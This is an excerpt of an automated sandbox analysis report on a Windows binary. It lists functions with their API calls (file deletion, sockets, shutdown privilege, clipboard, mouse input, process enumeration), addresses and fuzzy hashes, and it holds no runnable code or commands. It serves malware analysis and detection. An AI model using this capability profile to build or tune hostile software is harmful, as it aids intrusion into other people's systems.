        • FindNextFileW.KERNEL32(00000000,?), ref: 002596D3
        • FindClose.KERNEL32(00000000), ref: 002596DE
        • FindFirstFileW.KERNEL32(*.*,?), ref: 002596FA
        • SetCurrentDirectoryW.KERNEL32(?), ref: 0025974A
        • SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 00259768
        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00259772
        • FindClose.KERNEL32(00000000), ref: 0025977F
        • FindClose.KERNEL32(00000000), ref: 0025978F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
        • String ID: *.*
        • API String ID: 1409584000-438819550
        • Opcode ID: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
        • Instruction ID: d46f7430f20c5f13acff53f0eea5439d42f62cd9f18bbf5d6c044eaf3edbd9d3
        • Opcode Fuzzy Hash: 2a8af87ef785a06c580c6ceb39a0b38254094dc63a7572fe27a3f743ee04a312
        • Instruction Fuzzy Hash: 2131C77152161AAFDB149FB4EC4CADE77AC9F0A321F24415AFC09E2091DB30D9D88E14
        APIs
        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002597BE
        • FindNextFileW.KERNEL32(00000000,?), ref: 00259819
        • FindClose.KERNEL32(00000000), ref: 00259824
        • FindFirstFileW.KERNEL32(*.*,?), ref: 00259840
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00259890
        • SetCurrentDirectoryW.KERNEL32(002A6B7C), ref: 002598AE
        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002598B8
        • FindClose.KERNEL32(00000000), ref: 002598C5
        • FindClose.KERNEL32(00000000), ref: 002598D5
          • Part of subcall function 0024DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0024DB00
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
        • String ID: *.*
        • API String ID: 2640511053-438819550
        • Opcode ID: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
        • Instruction ID: f8ab53f6390b65520c7b9ee33e1bc0e3f7a461bc71263bb23c4b9f66d54c61ee
        • Opcode Fuzzy Hash: fdb1a8af2a0b7d08b0ba1d8d1eb792109b20e5685a477a6cf31e34d5a30dd80d
        • Instruction Fuzzy Hash: E731B23151121AEEDB10AFB4EC4CADE77AC9F06321F24455AEC14A21D1DB30DAE8CF28
        APIs
        • GetLocalTime.KERNEL32(?), ref: 00258257
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00258267
        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00258273
        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00258310
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00258324
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00258356
        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0025838C
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00258395
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CurrentDirectoryTime$File$Local$System
        • String ID: *.*
        • API String ID: 1464919966-438819550
        • Opcode ID: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
        • Instruction ID: c570dcc60a98ab044af395c66e363a57e339360edc583f43932faa2daaf090ec
        • Opcode Fuzzy Hash: fe5cdf67270d0cd60b47bd371dd485800a668fb2f6be01bf53364d09f64e7372
        • Instruction Fuzzy Hash: 10618872118745AFCB10EF60D8849AEB3E8BF89310F04885EF989D7251DB71E959CB92
        APIs
          • Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2
          • Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A
        • FindFirstFileW.KERNEL32(?,?), ref: 0024D122
        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0024D1DD
        • MoveFileW.KERNEL32(?,?), ref: 0024D1F0
        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0024D20D
        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0024D237
          • Part of subcall function 0024D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0024D21C,?,?), ref: 0024D2B2
        • FindClose.KERNEL32(00000000,?,?,?), ref: 0024D253
        • FindClose.KERNEL32(00000000), ref: 0024D264
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
        • String ID: \*.*
        • API String ID: 1946585618-1173974218
        • Opcode ID: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
        • Instruction ID: f477a72e96ae9e7dbe8784ba5374955e7d3f8442dd4d5986d6cf2f7cb7b6a692
        • Opcode Fuzzy Hash: 5de7687c24f47636dc84995db3388ef330f20202aa3a2585a286e99d9cc8a473
        • Instruction Fuzzy Hash: 61618C3180114DABCF19EFE1DA92DEDB7B5AF65300F604069E806771A2EB706F49CB60
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
        • String ID:
        • API String ID: 1737998785-0
        • Opcode ID: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
        • Instruction ID: 1061ba49aa0b06e928acafb1b2da9e5870b94e209b418c47c6dedecd68c2ae1e
        • Opcode Fuzzy Hash: 19a1029632d8b88d10cacb88b4b1142a9e7390039c23c0276a1c73ce308b240c
        • Instruction Fuzzy Hash: 0741E1702146119FDB14DF25E88DB19BBE4FF44329F15C09DE8298B6A2C731ED81CB80
        APIs
          • Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
          • Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
          • Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A
        • ExitWindowsEx.USER32(?,00000000), ref: 0024E932
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
        • String ID: $ $@$SeShutdownPrivilege
        • API String ID: 2234035333-3163812486
        • Opcode ID: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
        • Instruction ID: dc002956119fd6cf14f1d75b1c5dba6d25d57bf9f258fcdcef61315413865461
        • Opcode Fuzzy Hash: ce162a2d859332004db92777ea790f5efcfa9aed9d11810876935eed48b67915
        • Instruction Fuzzy Hash: 5001DB73630211ABFF5C26B4AC8ABBF725CB714750F160425FC02E21D2D6A15CA08694
        APIs
        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00261276
        • WSAGetLastError.WSOCK32 ref: 00261283
        • bind.WSOCK32(00000000,?,00000010), ref: 002612BA
        • WSAGetLastError.WSOCK32 ref: 002612C5
        • closesocket.WSOCK32(00000000), ref: 002612F4
        • listen.WSOCK32(00000000,00000005), ref: 00261303
        • WSAGetLastError.WSOCK32 ref: 0026130D
        • closesocket.WSOCK32(00000000), ref: 0026133C
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$closesocket$bindlistensocket
        • String ID:
        • API String ID: 540024437-0
        • Opcode ID: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
        • Instruction ID: 2cb9563e7fd7018e95377fbcff94e887f3b0a1eda8fc39c32be1d9e5f7b5e1f8
        • Opcode Fuzzy Hash: 99ab0a719d622e6056c6e4f0d22d7fc4c94e27261fff4b11f99c8d2d7bc85e00
        • Instruction Fuzzy Hash: CB417D31A001519FD710DF24D498B2ABBE5AF46318F2C818CE8568F296C771ECD1CBE1
        APIs
        • _free.LIBCMT ref: 0021B9D4
        • _free.LIBCMT ref: 0021B9F8
        • _free.LIBCMT ref: 0021BB7F
        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
        • WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
        • WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
        • _free.LIBCMT ref: 0021BD4B
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$ByteCharMultiWide$InformationTimeZone
        • String ID:
        • API String ID: 314583886-0
        • Opcode ID: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
        • Instruction ID: f813905551a25aa56ba2c17d7df4046bd9843dfdd811ef04218a029d6804b95a
        • Opcode Fuzzy Hash: cb2f7ee2ccf11134c112698249c12c35a3e2ec945608d28acb34dd11bdb1c847
        • Instruction Fuzzy Hash: 76C128719242069FCB269F789855AEA7BF8EF61310F24419AE854D7251DB308EF18B90
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: ffa6c81657eec7b84e05235db7532da9acf232aae951cf49852d270dfd57a1fa
        • Instruction ID: 3c41e477abd536ce51dc8062f27d8c5b2fc6508d435c9a4364259f16ff76dc7f
        • Opcode Fuzzy Hash: ffa6c81657eec7b84e05235db7532da9acf232aae951cf49852d270dfd57a1fa
        • Instruction Fuzzy Hash: F1C25A71E282298FDF64CE289D447EAB7F5EB58304F1541EAD81DE7280E774AE918F40
        APIs
        • _wcslen.LIBCMT ref: 002564DC
        • CoInitialize.OLE32(00000000), ref: 00256639
        • CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 00256650
        • CoUninitialize.OLE32 ref: 002568D4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateInitializeInstanceUninitialize_wcslen
        • String ID: .lnk
        • API String ID: 886957087-24824748
        • Opcode ID: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
        • Instruction ID: 34373bfd2d65f6e0ddb67cbfeb63ec3883a382baf5bc6c6c126cf95d782e0e79
        • Opcode Fuzzy Hash: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
        • Instruction Fuzzy Hash: 23D179715186419FD310EF24C885D6BB7E8FFA9304F50496DF4958B2A1EB30EE09CB92
        APIs
        • GetForegroundWindow.USER32(?,?,00000000), ref: 002622E8
          • Part of subcall function 0025E4EC: GetWindowRect.USER32(?,?), ref: 0025E504
        • GetDesktopWindow.USER32 ref: 00262312
        • GetWindowRect.USER32(00000000), ref: 00262319
        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00262355
        • GetCursorPos.USER32(?), ref: 00262381
        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002623DF
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Rectmouse_event$CursorDesktopForeground
        • String ID:
        • API String ID: 2387181109-0
        • Opcode ID: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
        • Instruction ID: ed68fbbbb96e9dc5e7dd5175369f07b1c64d55c43b192948f1b59e7d6f982f19
        • Opcode Fuzzy Hash: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
        • Instruction Fuzzy Hash: 7A3105725057159FDB20DF24D849F5BBBA9FF84310F10091DF98897281DB34EA68CB92
        APIs
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00259B78
        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00259C8B
          • Part of subcall function 00253874: GetInputState.USER32 ref: 002538CB
          • Part of subcall function 00253874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966
        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00259BA8
        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00259C75
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
        • String ID: *.*
        • API String ID: 1972594611-438819550
        • Opcode ID: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
        • Instruction ID: 094276c392b0a3a2a113dc403fb01836e0f6c2ddbb719b2cda9cea433754ec5b
        • Opcode Fuzzy Hash: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
        • Instruction Fuzzy Hash: E641747191060ADFDF14DF64D849AEE7BB8EF19312F244056E805A3191DB309E98CF64
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • DefDlgProcW.USER32(?,?,?,?,?), ref: 001F9A4E
        • GetSysColor.USER32(0000000F), ref: 001F9B23
        • SetBkColor.GDI32(?,00000000), ref: 001F9B36
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Color$LongProcWindow
        • String ID:
        • API String ID: 3131106179-0
        • Opcode ID: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
        • Instruction ID: 9d0e8e2d7a353ccb7bbc946192a7eb8cb8267a780b2e8db38351b346a050099d
        • Opcode Fuzzy Hash: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
        • Instruction Fuzzy Hash: 45A12AF0128549BFEB38BE3C9C69F7B269DEB82340F15420AF612C7591CB259D61C671
        APIs
          • Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
          • Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B
        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0026185D
        • WSAGetLastError.WSOCK32 ref: 00261884
        • bind.WSOCK32(00000000,?,00000010), ref: 002618DB
        • WSAGetLastError.WSOCK32 ref: 002618E6
        • closesocket.WSOCK32(00000000), ref: 00261915
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
        • String ID:
        • API String ID: 1601658205-0
        • Opcode ID: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
        • Instruction ID: cc9834f15fe0a1ce9d5ec42b98f82ec7fad4072b42e8ae8903f908fdd4074ed5
        • Opcode Fuzzy Hash: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
        • Instruction Fuzzy Hash: 0251B471A006009FE710AF24D88AF2A77E5AF54718F58845CF91A9F3D3C771AD928BA1
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$EnabledForegroundIconicVisibleZoomed
        • String ID:
        • API String ID: 292994002-0
        • Opcode ID: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
        • Instruction ID: 9db16ae977d9d2c9181dd0b041b1ddf1e0131a0cfc6e915c3f2f8dfaeb55dc05
        • Opcode Fuzzy Hash: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
        • Instruction Fuzzy Hash: AE21D3317502119FD7218F6ED888B2A7BA5EF95314F19C05DE84E8B351CB71DC62CB91
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID:
        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
        • API String ID: 0-1546025612
        • Opcode ID: 8e58050cae8db5572de59b6fa19d3957ccbf0aca244c47facc75fd9d206e2764
        • Instruction ID: 028a3ed68722c958dcf2b8e2eee953ef6c311c3f98e98a0493ffd13ed66f0f70
        • Opcode Fuzzy Hash: 8e58050cae8db5572de59b6fa19d3957ccbf0aca244c47facc75fd9d206e2764
        • Instruction Fuzzy Hash: 26A2E371E10A6ADBDF24CF99D8447ADB3B1FF54310F2581AAE819A7284EB309D91CF50
        APIs
        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002482AA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: lstrlen
        • String ID: ($tb*$|
        • API String ID: 1659193697-4261382565
        • Opcode ID: 305991d124b5dede757e0f76926cc3282733a16842e824f5e21e3d95ee92f059
        • Instruction ID: f4e3ae4460a2c79c2ef8c2e352a655aa32caeaf740ddc38c7a082229ce636bb4
        • Opcode Fuzzy Hash: 305991d124b5dede757e0f76926cc3282733a16842e824f5e21e3d95ee92f059
        • Instruction Fuzzy Hash: 76323875A20606DFC728CF19C480A6AB7F0FF48710B15C56EE59ADB3A1EB70E991CB40
        APIs
        • CreateToolhelp32Snapshot.KERNEL32 ref: 0026A6AC
        • Process32FirstW.KERNEL32(00000000,?), ref: 0026A6BA
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • Process32NextW.KERNEL32(00000000,?), ref: 0026A79C
        • CloseHandle.KERNEL32(00000000), ref: 0026A7AB
